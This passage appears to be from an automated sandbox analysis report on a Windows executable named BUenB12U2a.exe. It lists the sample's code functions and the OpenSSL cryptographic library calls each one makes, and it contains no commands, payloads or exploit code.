                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007622D4 CRYPTO_malloc,CONF_parse_list,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,1_2_00007FFE007622D4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007DA770 BN_bin2bn,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE007DA770
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00774790 CRYPTO_get_ex_new_index,1_2_00007FFE00774790
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761A41 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE00761A41
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761A05 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,_time64,X509_free,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free,1_2_00007FFE00761A05
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007617F8 EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key_ex,EVP_DigestSignInit_ex,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE007617F8
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00762365 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,CRYPTO_free,CRYPTO_free,1_2_00007FFE00762365
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007CA930 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFE007CA930
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00762577 ERR_new,ERR_set_debug,CRYPTO_free,BIO_clear_flags,BIO_set_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_cleanse,1_2_00007FFE00762577
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007613DE EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_security_bits,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_bn_param,EVP_PKEY_get_bn_param,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,ERR_set_debug,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE007613DE
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761181 CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFE00761181
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761A32 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,1_2_00007FFE00761A32
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0077E948 CRYPTO_free,1_2_00007FFE0077E948
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761811 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,1_2_00007FFE00761811
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00774980 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_snprintf,1_2_00007FFE00774980
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00776990 CRYPTO_THREAD_run_once,OPENSSL_sk_find,OPENSSL_sk_value,EVP_CIPHER_fetch,EVP_CIPHER_get_flags,1_2_00007FFE00776990
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00764B10 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFE00764B10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076213F EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFE0076213F
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076117C _time64,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,1_2_00007FFE0076117C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007620E0 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE007620E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007A8A90 CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFE007A8A90
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076110E EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,ERR_new,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,1_2_00007FFE0076110E
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00764BD0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFE00764BD0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761F87 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFE00761F87
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0077EC00 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,1_2_00007FFE0077EC00
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007A2C10 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,1_2_00007FFE007A2C10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00794C28 EVP_MAC_CTX_free,CRYPTO_free,1_2_00007FFE00794C28
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0078EB40 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,_time64,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,ERR_new,ERR_set_debug,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free,memcpy,1_2_00007FFE0078EB40
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00762464 CRYPTO_memcmp,ERR_new,ERR_set_debug,memchr,ERR_new,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE00762464
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007CACD0 CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFE007CACD0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00762112 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,1_2_00007FFE00762112
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00788D10 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,1_2_00007FFE00788D10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007621E4 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,1_2_00007FFE007621E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007C0D30 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFE007C0D30
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0078CD30 CRYPTO_THREAD_write_lock,OPENSSL_sk_new_null,OPENSSL_LH_delete,OPENSSL_sk_push,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,OPENSSL_sk_pop_free,1_2_00007FFE0078CD30
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007B6C40 CRYPTO_realloc,1_2_00007FFE007B6C40
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007611A9 EVP_MAC_CTX_free,CRYPTO_free,1_2_00007FFE007611A9
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076CDC0 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free,1_2_00007FFE0076CDC0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076195B CRYPTO_zalloc,EVP_MAC_free,EVP_MAC_CTX_free,CRYPTO_free,1_2_00007FFE0076195B
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761E65 ERR_new,ERR_set_debug,CRYPTO_clear_free,1_2_00007FFE00761E65
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761A23 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,1_2_00007FFE00761A23
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00798D90 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFE00798D90
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761677 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,1_2_00007FFE00761677
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007B0E50 CRYPTO_memcmp,1_2_00007FFE007B0E50
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076105F ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free,1_2_00007FFE0076105F
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007B6E70 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFE007B6E70
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761393 OSSL_PROVIDER_do_all,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,1_2_00007FFE00761393
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761B90 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFE00761B90
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00762374 CRYPTO_free,1_2_00007FFE00762374
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007C2F60 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,1_2_00007FFE007C2F60
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00764FA0 CRYPTO_free,1_2_00007FFE00764FA0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761262 X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,1_2_00007FFE00761262
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007B10C0 CRYPTO_free,CRYPTO_memdup,1_2_00007FFE007B10C0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0078D0C0 CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free,1_2_00007FFE0078D0C0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007CB0D0 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFE007CB0D0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007C1126 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFE007C1126
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076F060 CRYPTO_free,CRYPTO_memdup,1_2_00007FFE0076F060
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00762121 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memcmp,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE00762121
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076B200 CRYPTO_clear_free,1_2_00007FFE0076B200
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761483 CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE00761483
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007C3210 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,1_2_00007FFE007C3210
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076D140 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFE0076D140
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007CD170 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,1_2_00007FFE007CD170
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076111D CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_malloc,memcpy,CRYPTO_malloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_new,CRYPTO_malloc,memcpy,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup,1_2_00007FFE0076111D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007620EF CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFE007620EF
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076D2E1 CRYPTO_free,1_2_00007FFE0076D2E1
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007B12E0 ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,1_2_00007FFE007B12E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761997 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_decapsulate,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,1_2_00007FFE00761997
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007AD2F0 RAND_bytes_ex,CRYPTO_malloc,memset,1_2_00007FFE007AD2F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761ED8 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_find,CRYPTO_free,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFE00761ED8
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761992 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,OPENSSL_LH_new,X509_STORE_new,CTLOG_STORE_new_ex,OPENSSL_sk_num,X509_VERIFY_PARAM_new,OPENSSL_sk_new_null,OPENSSL_sk_new_null,CRYPTO_new_ex_data,CRYPTO_secure_zalloc,RAND_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,ERR_new,ERR_set_debug,1_2_00007FFE00761992
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076144C EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,1_2_00007FFE0076144C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076155A ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,1_2_00007FFE0076155A
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007A52A0 CRYPTO_free,1_2_00007FFE007A52A0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076230B ERR_new,ERR_set_debug,_time64,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_new,EVP_MD_fetch,ERR_new,ERR_new,ERR_set_debug,EVP_MD_free,EVP_MD_get_size,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_free,CRYPTO_free,1_2_00007FFE0076230B
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007C3420 ERR_new,ERR_set_debug,X509_get0_pubkey,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,CRYPTO_malloc,EVP_PKEY_encrypt_init,RAND_bytes_ex,EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,1_2_00007FFE007C3420
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761ACD ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,1_2_00007FFE00761ACD
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007611BD CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,CRYPTO_free,CRYPTO_free,1_2_00007FFE007611BD
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007A9370 ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_MD_CTX_get0_md,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFE007A9370
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007714E0 CRYPTO_free,CRYPTO_strndup,1_2_00007FFE007714E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007612CB CRYPTO_THREAD_run_once,1_2_00007FFE007612CB
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076193D CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFE0076193D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761023 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,1_2_00007FFE00761023
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00793460 CRYPTO_malloc,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,memset,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,ERR_set_debug,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_set_mark,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFE00793460
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007AF490 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE007AF490
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007A35E0 CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,1_2_00007FFE007A35E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076F540 EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_derive_set_peer,EVP_PKEY_is_a,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_derive,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,1_2_00007FFE0076F540
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007D5540 CRYPTO_memcmp,1_2_00007FFE007D5540
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076176C CRYPTO_malloc,CRYPTO_THREAD_lock_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_up_ref,X509_chain_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup,1_2_00007FFE0076176C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007625D6 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,1_2_00007FFE007625D6
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00777730 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFE00777730
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761087 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,1_2_00007FFE00761087
